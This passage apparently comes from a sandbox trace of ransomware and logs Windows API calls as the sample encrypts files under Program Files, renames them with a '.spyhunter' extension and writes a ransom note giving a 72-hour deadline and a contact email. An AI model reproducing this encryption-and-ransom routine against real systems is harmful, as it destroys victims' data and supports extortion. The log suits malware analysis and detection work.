(x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\ukraine.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\ukraine.txt.spyhunter")) returned 1 [0120.706] GetProcessHeap () returned 0x2c0000 [0120.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0120.706] GetProcessHeap () returned 0x2c0000 [0120.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0120.706] GetProcessHeap () returned 0x2c0000 [0120.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2e10 | out: hHeap=0x2c0000) returned 1 [0120.706] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8b8 | out: pbBuffer=0x57f8b8) returned 1 [0120.706] GetProcessHeap () returned 0x2c0000 [0120.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0120.706] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8b0*=0x30) returned 1 [0120.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp936.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0120.707] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT") returned 96 [0120.707] StrStrW (lpFirst="CP936.TXT", lpSrch=".txt") returned 0x0 [0120.707] GetProcessHeap () returned 0x2c0000 [0120.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0120.707] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f874, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f874*=0x2800, lpOverlapped=0x0) returned 1 [0120.778] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.778] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f874, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f874*=0x2800, lpOverlapped=0x0) returned 1 [0120.778] GetProcessHeap () returned 0x2c0000 [0120.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0120.779] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.779] WriteFile (in: hFile=0xb4, lpBuffer=0x57f8b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f874, lpOverlapped=0x0 | out: lpBuffer=0x57f8b4*, lpNumberOfBytesWritten=0x57f874*=0x4, lpOverlapped=0x0) returned 1 [0120.787] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f874, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f874*=0x30, lpOverlapped=0x0) returned 1 [0120.788] CloseHandle (hObject=0xb4) returned 1 [0120.788] GetProcessHeap () returned 0x2c0000 [0120.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0120.788] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT.spyhunter") returned 106 [0120.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp936.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp936.txt.spyhunter")) returned 1 [0120.789] GetProcessHeap () returned 0x2c0000 [0120.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0120.789] GetProcessHeap () returned 0x2c0000 [0120.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0120.802] GetProcessHeap () returned 0x2c0000 [0120.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3a18 | out: hHeap=0x2c0000) returned 1 [0120.802] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8b0 | out: pbBuffer=0x57f8b0) returned 1 [0120.802] GetProcessHeap () returned 0x2c0000 [0120.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0120.802] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8a8*=0x30) returned 1 [0120.802] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp874.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0120.804] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT") returned 96 [0120.804] StrStrW (lpFirst="CP874.TXT", lpSrch=".txt") returned 0x0 [0120.804] GetProcessHeap () returned 0x2c0000 [0120.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0120.804] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f86c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f86c*=0x2221, lpOverlapped=0x0) returned 1 [0121.086] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffdddf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.086] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2221, lpNumberOfBytesWritten=0x57f86c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f86c*=0x2221, lpOverlapped=0x0) returned 1 [0121.086] GetProcessHeap () returned 0x2c0000 [0121.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0121.086] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.087] WriteFile (in: hFile=0xb4, lpBuffer=0x57f8ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f86c, lpOverlapped=0x0 | out: lpBuffer=0x57f8ac*, lpNumberOfBytesWritten=0x57f86c*=0x4, lpOverlapped=0x0) returned 1 [0121.087] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f86c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f86c*=0x30, lpOverlapped=0x0) returned 1 [0121.087] CloseHandle (hObject=0xb4) returned 1 [0121.087] GetProcessHeap () returned 0x2c0000 [0121.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0121.087] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT.spyhunter") returned 106 [0121.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp874.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp874.txt.spyhunter")) returned 1 [0121.088] GetProcessHeap () returned 0x2c0000 [0121.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0121.088] GetProcessHeap () returned 0x2c0000 [0121.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0121.088] GetProcessHeap () returned 0x2c0000 [0121.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee37e8 | out: hHeap=0x2c0000) returned 1 [0121.088] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8b0 | out: pbBuffer=0x57f8b0) returned 1 [0121.088] GetProcessHeap () returned 0x2c0000 [0121.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0121.088] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f8a8*=0x30) returned 1 [0121.088] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1256.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0121.089] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT") returned 97 [0121.089] StrStrW (lpFirst="CP1256.TXT", lpSrch=".txt") returned 0x0 [0121.089] GetProcessHeap () returned 0x2c0000 [0121.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0121.089] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f86c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f86c*=0x22fb, lpOverlapped=0x0) returned 1 [0121.342] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffdd05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.342] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x22fb, lpNumberOfBytesWritten=0x57f86c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f86c*=0x22fb, lpOverlapped=0x0) returned 1 [0121.342] GetProcessHeap () returned 0x2c0000 [0121.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0121.343] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.343] WriteFile (in: hFile=0xb4, lpBuffer=0x57f8ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f86c, lpOverlapped=0x0 | out: lpBuffer=0x57f8ac*, lpNumberOfBytesWritten=0x57f86c*=0x4, lpOverlapped=0x0) returned 1 [0121.343] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f86c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f86c*=0x30, lpOverlapped=0x0) returned 1 [0121.343] CloseHandle (hObject=0xb4) returned 1 [0121.343] GetProcessHeap () returned 0x2c0000 [0121.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0121.343] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT.spyhunter") returned 107 [0121.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1256.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1256.txt.spyhunter")) returned 1 [0121.344] GetProcessHeap () returned 0x2c0000 [0121.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0121.344] GetProcessHeap () returned 0x2c0000 [0121.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0121.344] GetProcessHeap () returned 0x2c0000 [0121.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee34a0 | out: hHeap=0x2c0000) returned 1 [0121.346] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f8a0 | out: pbBuffer=0x57f8a0) returned 1 [0121.347] GetProcessHeap () returned 0x2c0000 [0121.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0121.347] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f898*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f898*=0x30) returned 1 [0121.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\readerupdater.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0121.347] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe") returned 71 [0121.347] StrStrW (lpFirst="ReaderUpdater.exe", lpSrch=".txt") returned 0x0 [0121.347] GetProcessHeap () returned 0x2c0000 [0121.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0121.347] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f85c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f85c*=0x2800, lpOverlapped=0x0) returned 1 [0121.974] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.974] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f85c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f85c*=0x2800, lpOverlapped=0x0) returned 1 [0121.974] GetProcessHeap () returned 0x2c0000 [0121.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0121.974] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.974] WriteFile (in: hFile=0xb4, lpBuffer=0x57f89c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f85c, lpOverlapped=0x0 | out: lpBuffer=0x57f89c*, lpNumberOfBytesWritten=0x57f85c*=0x4, lpOverlapped=0x0) returned 1 [0122.010] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f85c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f85c*=0x30, lpOverlapped=0x0) returned 1 [0122.010] CloseHandle (hObject=0xb4) returned 1 [0122.010] GetProcessHeap () returned 0x2c0000 [0122.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7d00 [0122.010] wnsprintfW (in: pszDest=0x2eb7d00, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe.spyhunter") returned 81 [0122.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\readerupdater.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\readerupdater.exe.spyhunter")) returned 1 [0122.011] GetProcessHeap () returned 0x2c0000 [0122.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7d00 | out: hHeap=0x2c0000) returned 1 [0122.012] GetProcessHeap () returned 0x2c0000 [0122.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.012] GetProcessHeap () returned 0x2c0000 [0122.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b100 | out: hHeap=0x2c0000) returned 1 [0122.014] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f898 | out: pbBuffer=0x57f898) returned 1 [0122.014] GetProcessHeap () returned 0x2c0000 [0122.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.014] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f890*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f890*=0x30) returned 1 [0122.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.word.hostadapter.v10.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0122.015] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll") returned 156 [0122.015] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll", lpSrch=".txt") returned 0x0 [0122.015] GetProcessHeap () returned 0x2c0000 [0122.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0122.015] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f854, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f854*=0x2800, lpOverlapped=0x0) returned 1 [0122.125] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.125] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f854, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f854*=0x2800, lpOverlapped=0x0) returned 1 [0122.125] GetProcessHeap () returned 0x2c0000 [0122.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0122.125] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.125] WriteFile (in: hFile=0xb4, lpBuffer=0x57f894*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f854, lpOverlapped=0x0 | out: lpBuffer=0x57f894*, lpNumberOfBytesWritten=0x57f854*=0x4, lpOverlapped=0x0) returned 1 [0122.184] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f854, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f854*=0x30, lpOverlapped=0x0) returned 1 [0122.184] CloseHandle (hObject=0xb4) returned 1 [0122.184] GetProcessHeap () returned 0x2c0000 [0122.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0122.185] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll.spyhunter") returned 166 [0122.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.word.hostadapter.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.word.hostadapter.v10.0.dll.spyhunter")) returned 1 [0122.186] GetProcessHeap () returned 0x2c0000 [0122.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0122.187] GetProcessHeap () returned 0x2c0000 [0122.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.187] GetProcessHeap () returned 0x2c0000 [0122.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e936f8 | out: hHeap=0x2c0000) returned 1 [0122.188] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f890 | out: pbBuffer=0x57f890) returned 1 [0122.188] GetProcessHeap () returned 0x2c0000 [0122.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.188] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f888*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f888*=0x30) returned 1 [0122.189] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.189] GetProcessHeap () returned 0x2c0000 [0122.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.189] GetProcessHeap () returned 0x2c0000 [0122.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf498 | out: hHeap=0x2c0000) returned 1 [0122.189] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f890 | out: pbBuffer=0x57f890) returned 1 [0122.189] GetProcessHeap () returned 0x2c0000 [0122.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.189] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f888*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f888*=0x30) returned 1 [0122.189] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\retired-essentially-blonde.exe" (normalized: "c:\\program files (x86)\\common files\\retired-essentially-blonde.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.189] GetProcessHeap () returned 0x2c0000 [0122.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.189] GetProcessHeap () returned 0x2c0000 [0122.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b100 | out: hHeap=0x2c0000) returned 1 [0122.190] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0122.190] WriteFile (in: hFile=0xb4, lpBuffer=0x57f7bf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57f8e8, lpOverlapped=0x0 | out: lpBuffer=0x57f7bf*, lpNumberOfBytesWritten=0x57f8e8*=0x127, lpOverlapped=0x0) returned 1 [0122.191] lstrlenA 